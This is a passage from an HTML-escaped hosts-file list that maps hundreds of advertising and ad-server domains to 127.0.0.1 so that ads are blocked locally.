/&gt;127.0.0.1 ad.itmedia.co.jp&lt;br /&gt;127.0.0.1 ad.jetsoftware.com&lt;br /&gt;127.0.0.1 ad.keenspace.com&lt;br /&gt;127.0.0.1 ad.krutilka.ru&lt;br /&gt;127.0.0.1 ad.leadcrunch.com&lt;br /&gt;127.0.0.1 ad.linx.cz&lt;br /&gt;127.0.0.1 ad.liveinternet.ru&lt;br /&gt;127.0.0.1 ad.lupa.cz&lt;br /&gt;127.0.0.1 ad.mediastorm.hu&lt;br /&gt;127.0.0.1 ad.mgd.de&lt;br /&gt;127.0.0.1 ad.moscowtimes.ru&lt;br /&gt;127.0.0.1 ad.musicmatch.com&lt;br /&gt;127.0.0.1 ad.mwizard.net&lt;br /&gt;127.0.0.1 ad.nachtagenten.de&lt;br /&gt;127.0.0.1 ad.nozonedata.com&lt;br /&gt;127.0.0.1 ad.nrk.no&lt;br /&gt;127.0.0.1 ad.pbs.bb.ru&lt;br /&gt;127.0.0.1 ad.playground.ru&lt;br /&gt;127.0.0.1 ad.preferances.com&lt;br /&gt;127.0.0.1 ad.rambler.ru&lt;br /&gt;127.0.0.1 ad.reunion.com&lt;br /&gt;127.0.0.1 ad.seznam.cz&lt;br /&gt;127.0.0.1 ad.simgames.net&lt;br /&gt;127.0.0.1 ad.spieletips.de&lt;br /&gt;127.0.0.1 ad.suprnova.org&lt;br /&gt;127.0.0.1 ad.surfsecret.com&lt;br /&gt;127.0.0.1 ad.sweclockers.com&lt;br /&gt;127.0.0.1 ad.t2t2.com&lt;br /&gt;127.0.0.1 ad.tbn.ru&lt;br /&gt;127.0.0.1 ad.tiscali.com&lt;br /&gt;127.0.0.1 ad.tisnet.net.tw&lt;br /&gt;127.0.0.1 ad.tomshardware.com&lt;br /&gt;127.0.0.1 ad.top50.to&lt;br /&gt;127.0.0.1 ad.tv2.no&lt;br /&gt;127.0.0.1 ad.tweakpc.de&lt;br /&gt;127.0.0.1 ad.uk.tangozebra.com&lt;br /&gt;127.0.0.1 ad.uol.com.br&lt;br /&gt;127.0.0.1 ad.usatoday.com&lt;br /&gt;127.0.0.1 ad.way.cz&lt;br /&gt;127.0.0.1 ad.wz.cz&lt;br /&gt;127.0.0.1 ad.yadro.ru&lt;br /&gt;127.0.0.1 ad.yieldmanager.com&lt;br /&gt;127.0.0.1 ad.yourmedia.com&lt;br /&gt;127.0.0.1 ad01.mediacorpsingapore.com&lt;br /&gt;127.0.0.1 ad1.emediate.dk&lt;br /&gt;127.0.0.1 ad1.gamezone.com&lt;br /&gt;127.0.0.1 ad1.hardware.no&lt;br /&gt;127.0.0.1 ad1.kde.cz&lt;br /&gt;127.0.0.1 ad1.lbe.ru&lt;br /&gt;127.0.0.1 ad1.outpost.com&lt;br /&gt;127.0.0.1 ad1.zendmedia.com&lt;br /&gt;127.0.0.1 ad2.atlas.cz&lt;br /&gt;127.0.0.1 ad2.bb.ru&lt;br /&gt;127.0.0.1 ad2.insitemedia.hu&lt;br /&gt;127.0.0.1 ad2.lbe.ru&lt;br /&gt;127.0.0.1 ad2.linx.cz&lt;br /&gt;127.0.0.1 ad2.linxcz.cz&lt;br /&gt;127.0.0.1 ad2.lupa.cz&lt;br /&gt;127.0.0.1 ad2.mamma.com&lt;br /&gt;127.0.0.1 ad2.seznam.cz&lt;br /&gt;127.0.0.1 ad2.tisnet.net.tw&lt;br /&gt;127.0.0.1 ad3.tisnet.net.tw&lt;br /&gt;127.0.0.1 ad4.atlas.cz&lt;br /&gt;127.0.0.1 ad4.tisnet.net.tw&lt;br /&gt;127.0.0.1 ad41.atlas.cz&lt;br /&gt;127.0.0.1 ad4ex.com&lt;br /&gt;127.0.0.1 adbanner.ro&lt;br /&gt;127.0.0.1 adboost.de.vu&lt;br /&gt;127.0.0.1 adbot.com&lt;br /&gt;127.0.0.1 adbot.theonion.com&lt;br /&gt;127.0.0.1 adbrite.com&lt;br /&gt;127.0.0.1 adbureau.net&lt;br /&gt;127.0.0.1 adbutler.com&lt;br /&gt;127.0.0.1 adbutler.de&lt;br /&gt;127.0.0.1 adcell.de&lt;br /&gt;127.0.0.1 adcenter.mdf.se&lt;br /&gt;127.0.0.1 adcenter.net&lt;br /&gt;127.0.0.1 adcentriconline.com&lt;br /&gt;127.0.0.1 adcept.net&lt;br /&gt;127.0.0.1 adclick.com&lt;br /&gt;127.0.0.1 adclick.gamespy.com&lt;br /&gt;127.0.0.1 adclick.mint.se&lt;br /&gt;127.0.0.1 adclick.ro&lt;br /&gt;127.0.0.1 adclient.rottentomatoes.com&lt;br /&gt;127.0.0.1 adclient1.tucows.com&lt;br /&gt;127.0.0.1 adcomplete.com&lt;br /&gt;127.0.0.1 adcontent.gamespy.com&lt;br /&gt;127.0.0.1 adcontroller.unicast.com&lt;br /&gt;127.0.0.1 adcreative.tribuneinteractive.com&lt;br /&gt;127.0.0.1 adcycle.com&lt;br /&gt;127.0.0.1 adcycle.icpeurope.net&lt;br /&gt;127.0.0.1 addcontrol.net&lt;br /&gt;127.0.0.1 addesktop.com&lt;br /&gt;127.0.0.1 addfreestats.com&lt;br /&gt;127.0.0.1 addme.com&lt;br /&gt;127.0.0.1 addynamix.com&lt;br /&gt;127.0.0.1 adengage.com&lt;br /&gt;127.0.0.1 adext.inkclub.com&lt;br /&gt;127.0.0.1 adfarm.mediaplex.com&lt;br /&gt;127.0.0.1 adfiles.api.no&lt;br /&gt;127.0.0.1 adflight.com&lt;br /&gt;127.0.0.1 adfly.com&lt;br /&gt;127.0.0.1 adhostcenter.com&lt;br /&gt;127.0.0.1 adi.mainichi.co.jp&lt;br /&gt;127.0.0.1 adimage.asiaone.com.sg&lt;br /&gt;127.0.0.1 adimages.been.com&lt;br /&gt;127.0.0.1 adimages.carsoup.com&lt;br /&gt;127.0.0.1 adimages.go.com&lt;br /&gt;127.0.0.1 adimages.homestore.com&lt;br /&gt;127.0.0.1 adimages.sanomawsoy.fi&lt;br /&gt;127.0.0.1 adimg.cnet.com&lt;br /&gt;127.0.0.1 adimg.com.com&lt;br /&gt;127.0.0.1 adimg1.chosun.com&lt;br /&gt;127.0.0.1 adimgs.sapo.pt&lt;br /&gt;127.0.0.1 adincl.gopher.com&lt;br /&gt;127.0.0.1 adition.de&lt;br /&gt;127.0.0.1 adition.net&lt;br /&gt;127.0.0.1 adjuggler.yourdictionary.com&lt;br /&gt;127.0.0.1 adlegend.com&lt;br /&gt;127.0.0.1 adlink.de&lt;br /&gt;127.0.0.1 adlog.com.com&lt;br /&gt;127.0.0.1 adlogix.net&lt;br /&gt;127.0.0.1 adm.ad.asap-asp.net&lt;br /&gt;127.0.0.1 adman.freeze.com&lt;br /&gt;127.0.0.1 admanagement.ch&lt;br /&gt;127.0.0.1 admanager.beweb.com&lt;br /&gt;127.0.0.1 admanager.btopenworld.com&lt;br /&gt;127.0.0.1 admanager.carsoup.com&lt;br /&gt;127.0.0.1 admanager.persianblog.com&lt;br /&gt;127.0.0.1 admaximize.com&lt;br /&gt;127.0.0.1 admedia.ro&lt;br /&gt;127.0.0.1 admeta.com&lt;br /&gt;127.0.0.1 admex.com&lt;br /&gt;127.0.0.1 adminder.com&lt;br /&gt;127.0.0.1 adminshop.com&lt;br /&gt;127.0.0.1 admonitor.com&lt;br /&gt;127.0.0.1 admonitor.net&lt;br /&gt;127.0.0.1 admotion.com.ar&lt;br /&gt;127.0.0.1 adnet.biz&lt;br /&gt;127.0.0.1 adnews.maddog2000.de&lt;br /&gt;127.0.0.1 ado.internet.cz&lt;br /&gt;127.0.0.1 adorigin.com&lt;br /&gt;127.0.0.1 adpepper.dk&lt;br /&gt;127.0.0.1 adpick.switchboard.com&lt;br /&gt;127.0.0.1 adprofile.net&lt;br /&gt;127.0.0.1 adprojekt.pl&lt;br /&gt;127.0.0.1 adpush.dreamscape.com&lt;br /&gt;127.0.0.1 adq.nextag.com&lt;br /&gt;127.0.0.1 adremedy.com&lt;br /&gt;127.0.0.1 adremote.pathfinder.com&lt;br /&gt;127.0.0.1 adrenaline.cz&lt;br /&gt;127.0.0.1 adrenalinesk.sk&lt;br /&gt;127.0.0.1 adreporting.com&lt;br /&gt;127.0.0.1 adres.internet.com&lt;br /&gt;127.0.0.1 adrevolver.com&lt;br /&gt;127.0.0.1 adrevolver.holzmannverlag.de&lt;br /&gt;127.0.0.1 adriver.ru&lt;br /&gt;127.0.0.1 adroar.com&lt;br /&gt;127.0.0.1 adrotate.de&lt;br /&gt;127.0.0.1 adrotator.net&lt;br /&gt;127.0.0.1 ads-205.quarterserver.de&lt;br /&gt;127.0.0.1 ads-de.spray.net&lt;br /&gt;127.0.0.1 ads.100asians.com&lt;br /&gt;127.0.0.1 ads.5ci.lt&lt;br /&gt;127.0.0.1 ads.aceweb.net&lt;br /&gt;127.0.0.1 ads.adshareware.net&lt;br /&gt;127.0.0.1 ads.adultfriendfinder.com&lt;br /&gt;127.0.0.1 ads.advance.net&lt;br /&gt;127.0.0.1 ads.adverline.com&lt;br /&gt;127.0.0.1 ads.affiliates.match.com&lt;br /&gt;127.0.0.1 ads.allsites.com&lt;br /&gt;127.0.0.1 ads.alwayson-network.com&lt;br /&gt;127.0.0.1 ads.amazingmedia.com&lt;br /&gt;127.0.0.1 ads.amdmb.com&lt;br /&gt;127.0.0.1 ads.aol.com&lt;br /&gt;127.0.0.1 ads.as4x.tmcs.net&lt;br /&gt;127.0.0.1 ads.asia1.com.sg&lt;br /&gt;127.0.0.1 ads.asiafriendfinder.com&lt;br /&gt;127.0.0.1 ads.aspalliance.com&lt;br /&gt;127.0.0.1 ads.battle.net&lt;br /&gt;127.0.0.1 ads.belointeractive.com&lt;br /&gt;127.0.0.1 ads.berlinonline.de&lt;br /&gt;127.0.0.1 ads.betanews.com&lt;br /&gt;127.0.0.1 ads.bfast.com&lt;br /&gt;127.0.0.1 ads.bigcitytools.com&lt;br /&gt;127.0.0.1 ads.bigfoot.com&lt;br /&gt;127.0.0.1 ads.billiton.de&lt;br /&gt;127.0.0.1 ads.bitsonthewire.com&lt;br /&gt;127.0.0.1 ads.blick.ch&lt;br /&gt;127.0.0.1 ads.bloomberg.com&lt;br /&gt;127.0.0.1 ads.bluemountain.com&lt;br /&gt;127.0.0.1 ads.box.sk&lt;br /&gt;127.0.0.1 ads.businessweek.com&lt;br /&gt;127.0.0.1 ads.canalblog.com&lt;br /&gt;127.0.0.1 ads.canoe.ca&lt;br /&gt;127.0.0.1 ads.cavello.com&lt;br /&gt;127.0.0.1 ads.cbc.ca&lt;br /&gt;127.0.0.1 ads.cdfreaks.com&lt;br /&gt;127.0.0.1 ads.centraliprom.com&lt;br /&gt;127.0.0.1 ads.cgnetworks.com&lt;br /&gt;127.0.0.1 ads.channel4.com&lt;br /&gt;127.0.0.1 ads.cimedia.com&lt;br /&gt;127.0.0.1 ads.clearchannel.com&lt;br /&gt;127.0.0.1 ads.collegclub.com&lt;br /&gt;127.0.0.1 ads.com.com&lt;br /&gt;127.0.0.1 ads.currantbun.com&lt;br /&gt;127.0.0.1 ads.cyberfight.ru&lt;br /&gt;127.0.0.1 ads.cybersales.cz&lt;br /&gt;127.0.0.1 ads.danworld.net&lt;br /&gt;127.0.0.1 ads.datingyes.com&lt;br /&gt;127.0.0.1 ads.dbforums.com&lt;br /&gt;127.0.0.1 ads.ddj.com&lt;br /&gt;127.0.0.1 ads.deltha.hu&lt;br /&gt;127.0.0.1 ads.dennisnet.co.uk&lt;br /&gt;127.0.0.1 ads.desmoinesregister.com&lt;br /&gt;127.0.0.1 ads.detelefoongids.nl&lt;br /&gt;127.0.0.1 ads.developershed.com&lt;br /&gt;127.0.0.1 ads.deviantart.com&lt;br /&gt;127.0.0.1 ads.digitalmedianet.com&lt;br /&gt;127.0.0.1 ads.digitalpoint.com&lt;br /&gt;127.0.0.1 ads.directionsmag.com&lt;br /&gt;127.0.0.1 ads.discovery.com&lt;br /&gt;127.0.0.1 ads.dk&lt;br /&gt;127.0.0.1 ads.dmk-internet.com&lt;br /&gt;127.0.0.1 ads.e-planning.net&lt;br /&gt;127.0.0.1 ads.edbindex.dk&lt;br /&gt;127.0.0.1 ads.einmedia.com&lt;br /&gt;127.0.0.1 ads.erotism.com&lt;br /&gt;127.0.0.1 ads.esmas.com&lt;br /&gt;127.0.0.1 ads.eu.msn.com&lt;br /&gt;127.0.0.1 ads.eudora.com&lt;br /&gt;127.0.0.1 ads.exhedra.com&lt;br /&gt;127.0.0.1 ads.ezboard.com&lt;br /&gt;127.0.0.1 ads.fairfax.com.au&lt;br /&gt;127.0.0.1 ads.filmup.com&lt;br /&gt;127.0.0.1 ads.firingsquad.com&lt;br /&gt;127.0.0.1 ads.flooble.com&lt;br /&gt;127.0.0.1 ads.floridatoday.com&lt;br /&gt;127.0.0.1 ads.fool.com&lt;br /&gt;127.0.0.1 ads.forbes.com&lt;br /&gt;127.0.0.1 ads.forbes.net&lt;br /&gt;127.0.0.1 ads.forium.de&lt;br /&gt;127.0.0.1 ads.fortunecity.com&lt;br /&gt;127.0.0.1 ads.foxkidseurope.net&lt;br /&gt;127.0.0.1 ads.freecity.de&lt;br /&gt;127.0.0.1 ads.freeze.com&lt;br /&gt;127.0.0.1 ads.friendtest.com&lt;br /&gt;127.0.0.1 ads.ft.com&lt;br /&gt;127.0.0.1 ads.g4techtv.com&lt;br /&gt;127.0.0.1 ads.game.net&lt;br /&gt;127.0.0.1 ads.gamecity.net&lt;br /&gt;127.0.0.1 ads.gamecopyworld.no&lt;br /&gt;127.0.0.1 ads.gameforgeads.de&lt;br /&gt;127.0.0.1 ads.gamershell.com&lt;br /&gt;127.0.0.1 ads.gamespy.com&lt;br /&gt;127.0.0.1 ads.gamespyid.com&lt;br /&gt;127.0.0.1 ads.gamigo.de&lt;br /&gt;127.0.0.1 ads.gawker.com&lt;br /&gt;127.0.0.1 ads.gettools.com&lt;br /&gt;127.0.0.1 ads.globeandmail.com&lt;br /&gt;127.0.0.1 ads.gotfrag.com&lt;br /&gt;127.0.0.1 ads.goyk.com&lt;br /&gt;127.0.0.1 ads.grindinggears.com&lt;br /&gt;127.0.0.1 ads.guardian.co.uk&lt;br /&gt;127.0.0.1 ads.guardianunlimited.co.uk&lt;br /&gt;127.0.0.1 ads.hbv.de&lt;br /&gt;127.0.0.1 ads.heartlight.org&lt;br /&gt;127.0.0.1 ads.herald-sun.com&lt;br /&gt;127.0.0.1 ads.hollywood.com&lt;br /&gt;127.0.0.1 ads.humorbua.no&lt;br /&gt;127.0.0.1 ads.iafrica.com&lt;br /&gt;127.0.0.1 ads.iboost.com&lt;br /&gt;127.0.0.1 ads.icq.com&lt;br /&gt;127.0.0.1 ads.ign.com&lt;br /&gt;127.0.0.1 ads.imdb.com&lt;br /&gt;127.0.0.1 ads.img.co.za&lt;br /&gt;127.0.0.1 ads.indya.com&lt;br /&gt;127.0.0.1 ads.indystar.com&lt;br /&gt;127.0.0.1 ads.inetfast.com&lt;br /&gt;127.0.0.1 ads.inetinteractive.com&lt;br /&gt;127.0.0.1 ads.infi.net&lt;br /&gt;127.0.0.1 ads.infospace.com&lt;br /&gt;127.0.0.1 ads.internic.co.il&lt;br /&gt;127.0.0.1 ads.inthemix.com.au&lt;br /&gt;127.0.0.1 ads.ipowerweb.com&lt;br /&gt;127.0.0.1 ads.isoftmarketing.com&lt;br /&gt;127.0.0.1 ads.itv.com&lt;br /&gt;127.0.0.1 ads.iwon.com&lt;br /&gt;127.0.0.1 ads.jimworld.com&lt;br /&gt;127.0.0.1 ads.jpost.com&lt;br /&gt;127.0.0.1 ads.jubii.dk&lt;br /&gt;127.0.0.1 ads.katz.ws&lt;br /&gt;127.0.0.1 ads.kinobox.cz&lt;br /&gt;127.0.0.1 ads.krawall.de&lt;br /&gt;127.0.0.1 ads.leo.org&lt;br /&gt;127.0.0.1 ads.linuxjournal.com&lt;br /&gt;127.0.0.1 ads.linuxquestions.org&lt;br /&gt;127.0.0.1 ads.linuxsecurity.com&lt;br /&gt;127.0.0.1 ads.lnkworld.com&lt;br /&gt;127.0.0.1 ads.localnow.com&lt;br /&gt;127.0.0.1 ads.lycos-europe.com&lt;br /&gt;127.0.0.1 ads.lycos.com&lt;br /&gt;127.0.0.1 ads.madison.com&lt;br /&gt;127.0.0.1 ads.mariuana.it&lt;br /&gt;127.0.0.1 ads.mcafee.com&lt;br /&gt;127.0.0.1 ads.mediaodyssey.com&lt;br /&gt;127.0.0.1 ads.mediaturf.net&lt;br /&gt;127.0.0.1 ads.metropol.dk&lt;br /&gt;127.0.0.1 ads.mgnetwork.com&lt;br /&gt;127.0.0.1 ads.monster.com&lt;br /&gt;127.0.0.1 ads.msn.com&lt;br /&gt;127.0.0.1 ads.multimania.lycos.fr&lt;br /&gt;127.0.0.1 ads.musiccity.com&lt;br /&gt;127.0.0.1 ads.myguysolutions.com&lt;br /&gt;127.0.0.1 ads.mysimon.com&lt;br /&gt;127.0.0.1 ads.nandomedia.com&lt;br /&gt;127.0.0.1 ads.nationalreview.com&lt;br /&gt;127.0.0.1 ads.neoseeker.com&lt;br /&gt;127.0.0.1 ads.neowin.net&lt;br /&gt;127.0.0.1 ads.netmechanic.com&lt;br /&gt;127.0.0.1 ads.newcity.com&lt;br /&gt;127.0.0.1 ads.newcitynet.com&lt;br /&gt;127.0.0.1 ads.newdream.net&lt;br /&gt;127.0.0.1 ads.newmedia.cz&lt;br /&gt;127.0.0.1 ads.newsint.co.uk&lt;br /&gt;127.0.0.1 ads.newsobserver.com&lt;br /&gt;127.0.0.1 ads.newsquest.co.uk&lt;br /&gt;127.0.0.1 ads.newtimes.com&lt;br /&gt;127.0.0.1 ads.ngenuity.com&lt;br /&gt;127.0.0.1 ads.ninemsn.com.au&lt;br /&gt;127.0.0.1 ads.nola.com&lt;br /&gt;127.0.0.1 ads.nordichardware.se&lt;br /&gt;127.0.0.1 ads.ntadvice.com&lt;br /&gt;127.0.0.1 ads.nwsource.com&lt;br /&gt;127.0.0.1 ads.nyi.net&lt;br /&gt;127.0.0.1 ads.nyjournalnews.com&lt;br /&gt;127.0.0.1 ads.nypost.com&lt;br /&gt;127.0.0.1 ads.nytimes.com&lt;br /&gt;127.0.0.1 ads.nzcity.co.nz&lt;br /&gt;127.0.0.1 ads.ole.com&lt;br /&gt;127.0.0.1 ads.oneplace.com&lt;br /&gt;127.0.0.1 ads.onlineguiden.com&lt;br /&gt;127.0.0.1 ads.optusnet.com.au&lt;br /&gt;127.0.0.1 ads.orsm.net&lt;br /&gt;127.0.0.1 ads.osdn.com&lt;br /&gt;127.0.0.1 ads.osnews.com&lt;br /&gt;127.0.0.1 ads.ourbrisbane.com&lt;br /&gt;127.0.0.1 ads.overclockers.at&lt;br /&gt;127.0.0.1 ads.pcper.com&lt;br /&gt;127.0.0.1 ads.peel.com&lt;br /&gt;127.0.0.1 ads.phparena.net&lt;br /&gt;127.0.0.1 ads.phpclasses.org&lt;br /&gt;127.0.0.1 ads.pittsburghlive.com&lt;br /&gt;127.0.0.1 ads.planet.nl&lt;br /&gt;127.0.0.1 ads.pni.com&lt;br /&gt;127.0.0.1 ads.powweb.com&lt;br /&gt;127.0.0.1 ads.premiumnetwork.com&lt;br /&gt;127.0.0.1 ads.primeinteractive.net&lt;br /&gt;127.0.0.1 ads.prisacom.com&lt;br /&gt;127.0.0.1 ads.pro-market.net&lt;br /&gt;127.0.0.1 ads.realcities.com&lt;br /&gt;127.0.0.1 ads.realmedia.de&lt;br /&gt;127.0.0.1 ads.recoletos.es&lt;br /&gt;127.0.0.1 ads.rediff.com&lt;br /&gt;127.0.0.1 ads.rivals.net&lt;br /&gt;127.0.0.1 ads.rottentomatoes.com&lt;br /&gt;127.0.0.1 ads.rp-online.de&lt;br /&gt;127.0.0.1 ads.rpgdot.com&lt;br /&gt;127.0.0.1 ads.rpgui.com&lt;br /&gt;127.0.0.1 ads.satyamonline.com&lt;br /&gt;127.0.0.1 ads.savannahnow.com&lt;br /&gt;127.0.0.1 ads.scifi.com&lt;br /&gt;127.0.0.1 ads.sexplanets.com&lt;br /&gt;127.0.0.1 ads.shareprovider.com&lt;br /&gt;127.0.0.1 ads.sify.com&lt;br /&gt;127.0.0.1 ads.simtel.net&lt;br /&gt;127.0.0.1 ads.smartclick.com&lt;br /&gt;127.0.0.1 ads.softwareoutfit.com&lt;br /&gt;127.0.0.1 ads.space.com&lt;br /&gt;127.0.0.1 ads.sptimes.com&lt;br /&gt;127.0.0.1 ads.stationplay.com&lt;br /&gt;127.0.0.1 ads.stileproject.com&lt;br /&gt;127.0.0.1 ads.storagereview.net&lt;br /&gt;127.0.0.1 ads.stratics.com&lt;br /&gt;127.0.0.1 ads.switchboard.com&lt;br /&gt;127.0.0.1 ads.techtv.com&lt;br /&gt;127.0.0.1 ads.telegraaf.nl&lt;br /&gt;127.0.0.1 ads.telegraph.co.uk&lt;br /&gt;127.0.0.1 ads.theglobeandmail.com&lt;br /&gt;127.0.0.1 ads.thestar.com&lt;br /&gt;127.0.0.1 ads.thewebfreaks.com&lt;br /&gt;127.0.0.1 ads.thottbot.com&lt;br /&gt;127.0.0.1 ads.tiscali.fr&lt;br /&gt;127.0.0.1 ads.tmcs.net&lt;br /&gt;127.0.0.1 ads.top500.org&lt;br /&gt;127.0.0.1 ads.townhall.com&lt;br /&gt;127.0.0.1 ads.tripod.com&lt;br /&gt;127.0.0.1 ads.tripod.lycos.co.uk&lt;br /&gt;127.0.0.1 ads.tripod.lycos.de&lt;br /&gt;127.0.0.1 ads.tripod.lycos.nl&lt;br /&gt;127.0.0.1 ads.tucows.com&lt;br /&gt;127.0.0.1 ads.ucomics.com&lt;br /&gt;127.0.0.1 ads.uigc.net&lt;br /&gt;127.0.0.1 ads.unixathome.org&lt;br /&gt;127.0.0.1 ads.urli.net&lt;br /&gt;127.0.0.1 ads.usatoday.com&lt;br /&gt;127.0.0.1 ads.v3.com&lt;br /&gt;127.0.0.1 ads.v3exchange.com&lt;br /&gt;127.0.0.1 ads.vesperexchange.com&lt;br /&gt;127.0.0.1 ads.videoaxs.com&lt;br /&gt;127.0.0.1 ads.virtual-nights.com&lt;br /&gt;127.0.0.1 ads.virtualcountries.com&lt;br /&gt;127.0.0.1 ads.vnuemedia.com&lt;br /&gt;127.0.0.1 ads.vnumedia.com&lt;br /&gt;127.0.0.1 ads.wanadooregie.com&lt;br /&gt;127.0.0.1 ads.weather.ca&lt;br /&gt;127.0.0.1 ads.weather.com&lt;br /&gt;127.0.0.1 ads.web.aol.com&lt;br /&gt;127.0.0.1 ads.web.cs.com&lt;br /&gt;127.0.0.1 ads.web.de&lt;br /&gt;127.0.0.1 ads.web21.com&lt;br /&gt;127.0.0.1 ads.webattack.com&lt;br /&gt;127.0.0.1 ads.webheat.com&lt;br /&gt;127.0.0.1 ads.webnet.advance.net&lt;br /&gt;127.0.0.1 ads.whi.co.nz&lt;br /&gt;127.0.0.1 ads.winsite.com&lt;br /&gt;127.0.0.1 ads.wunderground.com&lt;br /&gt;127.0.0.1 ads.x10.com&lt;br /&gt;127.0.0.1 ads.x10.net&lt;br /&gt;127.0.0.1 ads.xtra.co.nz&lt;br /&gt;127.0.0.1 ads.yourfreedvds.com&lt;br /&gt;127.0.0.1 ads.zdnet.com&lt;br /&gt;127.0.0.1 ads001.webwombat.com.au&lt;br /&gt;127.0.0.1 ads1.advance.net&lt;br /&gt;127.0.0.1 ads1.akkuna.com&lt;br /&gt;127.0.0.1 ads1.canoe.ca&lt;br /&gt;127.0.0.1 ads1.erotism.com&lt;br /&gt;127.0.0.1 ads1.mediacapital.pt&lt;br /&gt;127.0.0.1 ads1.sptimes.com&lt;br /&gt;127.0.0.1 ads1.theglobeandmail.com&lt;br /&gt;127.0.0.1 ads10.speedbit.com&lt;br /&gt;127.0.0.1 ads2.advance.net&lt;br /&gt;127.0.0.1 ads2.akkuna.com&lt;br /&gt;127.0.0.1 ads2.clearchannel.com&lt;br /&gt;127.0.0.1 ads2.collegclub.com&lt;br /&gt;127.0.0.1 ads2.collegeclub.com&lt;br /&gt;127.0.0.1 ads2.exhedra.com&lt;br /&gt;127.0.0.1 ads2.firingsquad.com&lt;br /&gt;127.0.0.1 ads2.gamecity.net&lt;br /&gt;127.0.0.1 ads2.jubii.dk&lt;br /&gt;127.0.0.1 ads2.oneplace.com&lt;br /&gt;127.0.0.1 ads2.osdn.com&lt;br /&gt;127.0.0.1 ads2.top500.org&lt;br /&gt;127.0.0.1 ads3.advance.net&lt;br /&gt;127.0.0.1 ads3.gamecity.net&lt;br /&gt;127.0.0.1 ads360.com&lt;br /&gt;127.0.0.1 ads4.advance.net&lt;br /&gt;127.0.0.1 ads4.clearchannel.com&lt;br /&gt;127.0.0.1 ads4.gamecity.net&lt;br /&gt;127.0.0.1 ads4.realcities.com&lt;br /&gt;127.0.0.1 ads4homes.com&lt;br /&gt;127.0.0.1 ads5.advance.net&lt;br /&gt;127.0.0.1 ads5.canoe.ca&lt;br /&gt;127.0.0.1 ads6.advance.net&lt;br /&gt;127.0.0.1 ads6.gamecity.net&lt;br /&gt;127.0.0.1 ads7.gamecity.net&lt;br /&gt;127.0.0.1 ads8.com&lt;br /&gt;127.0.0.1 adsag.com&lt;br /&gt;127.0.0.1 Adsatt.ABCNews.starwave.com&lt;br /&gt;127.0.0.1 adsatt.espn.go.com&lt;br /&gt;127.0.0.1 adsatt.espn.starwave.com&lt;br /&gt;127.0.0.1 Adsatt.go.starwave.com&lt;br /&gt;127.0.0.1 adscholar.com&lt;br /&gt;127.0.0.1 adscpm.com&lt;br /&gt;127.0.0.1 adsdaq.com&lt;br /&gt;127.0.0.1 adserv.aip.org&lt;br /&gt;127.0.0.1 adserv.gamezone.de&lt;br /&gt;127.0.0.1 adserv.geocomm.com&lt;br /&gt;127.0.0.1 adserv.happypuppy.com&lt;br /&gt;127.0.0.1 adserv.iafrica.com&lt;br /&gt;127.0.0.1 adserv.lwmn.net&lt;br /&gt;127.0.0.1 adserv.quality-channel.de&lt;br /&gt;127.0.0.1 adserv1.winboard.org&lt;br /&gt;127.0.0.1 adserve.viaarena.com&lt;br /&gt;127.0.0.1 adserver.71i.de&lt;br /&gt;127.0.0.1 adserver.adultfriendfinder.com&lt;br /&gt;127.0.0.1 adserver.allerinternett.com&lt;br /&gt;127.0.0.1 adserver.anm.co.uk&lt;br /&gt;127.0.0.1 adserver.ath.cx&lt;br /&gt;127.0.0.1 adserver.billiger-surfen.de&lt;br /&gt;127.0.0.1 adserver.billiger-telefonieren.de&lt;br /&gt;127.0.0.1 adserver.bluewin.ch&lt;br /&gt;127.0.0.1 adserver.colleges.com&lt;br /&gt;127.0.0.1 adserver.com&lt;br /&gt;127.0.0.1 adserver.conjelco.com&lt;br /&gt;127.0.0.1 adserver.developersnetwork.com&lt;br /&gt;127.0.0.1 adserver.digitoday.com&lt;br /&gt;127.0.0.1 adserver.dotcommedia.de&lt;br /&gt;127.0.0.1 adserver.eudora.com&lt;br /&gt;127.0.0.1 adserver.filefront.com&lt;br /&gt;127.0.0.1 adserver.freecity.de&lt;br /&gt;127.0.0.1 adserver.freenet.de&lt;br /&gt;127.0.0.1 adserver.friendfinder.com&lt;br /&gt;127.0.0.1 adserver.gamesquad.net&lt;br /&gt;127.0.0.1 adserver.garden.com&lt;br /&gt;127.0.0.1 adserver.geizkragen.de&lt;br /&gt;127.0.0.1 adserver.gr&lt;br /&gt;127.0.0.1 adserver.hardwareanalysis.com&lt;br /&gt;127.0.0.1 adserver.hispavista.com&lt;br /&gt;127.0.0.1 adserver.humanux.com&lt;br /&gt;127.0.0.1 adserver.ign.com&lt;br /&gt;127.0.0.1 adserver.isonews.com&lt;br /&gt;127.0.0.1 adserver.itsfogo.com&lt;br /&gt;127.0.0.1 adserver.janes.com&lt;br /&gt;127.0.0.1 adserver.jolt.co.uk&lt;br /&gt;127.0.0.1 adserver.journalinteractive.com&lt;br /&gt;127.0.0.1 adserver.legacy-network.com&lt;br /&gt;127.0.0.1 adserver.libero.it&lt;br /&gt;127.0.0.1 adserver.m2kcore.com&lt;br /&gt;127.0.0.1 adserver.monster.com&lt;br /&gt;127.0.0.1 adserver.news.com.au&lt;br /&gt;127.0.0.1 adserver.ngz-network.de&lt;br /&gt;127.0.0.1 adserver.nydailynews.com&lt;br /&gt;127.0.0.1 adserver.nzoom.com&lt;br /&gt;127.0.0.1 adserver.pl&lt;br /&gt;127.0.0.1 adserver.plhb.com&lt;br /&gt;127.0.0.1 adserver.portalofevil.com&lt;br /&gt;127.0.0.1 adserver.portugalmail.net&lt;br /&gt;127.0.0.1 adserver.portugalmail.pt&lt;br /&gt;127.0.0.1 adserver.ro&lt;br /&gt;127.0.0.1 adserver.sanomawsoy.fi&lt;br /&gt;127.0.0.1 adserver.securityfocus.com&lt;br /&gt;127.0.0.1 adserver.sharewareonline.com&lt;br /&gt;127.0.0.1 adserver.snowball.com&lt;br /&gt;127.0.0.1 adserver.startnow.com&lt;br /&gt;127.0.0.1 adserver.terra.es&lt;br /&gt;127.0.0.1 adserver.theonering.net&lt;br /&gt;127.0.0.1 adserver.track-star.com&lt;br /&gt;127.0.0.1 adserver.trb.com&lt;br /&gt;127.0.0.1 adserver.tribuneinteractive.com&lt;br /&gt;127.0.0.1 adserver.ugo.com&lt;br /&gt;127.0.0.1 adserver.usermagnet.com&lt;br /&gt;127.0.0.1 adserver.visions.de&lt;br /&gt;127.0.0.1 adserver.webhostlist.de&lt;br /&gt;127.0.0.1 adserver.yahoo.com&lt;br /&gt;127.0.0.1 adserver1-images.backbeatmedia.com&lt;br /&gt;127.0.0.1 adserver1.backbeatmedia.com&lt;br /&gt;127.0.0.1 adserver1.mediainsight.de&lt;br /&gt;127.0.0.1 adserver1.ogilvy-interactive.de&lt;br /&gt;127.0.0.1 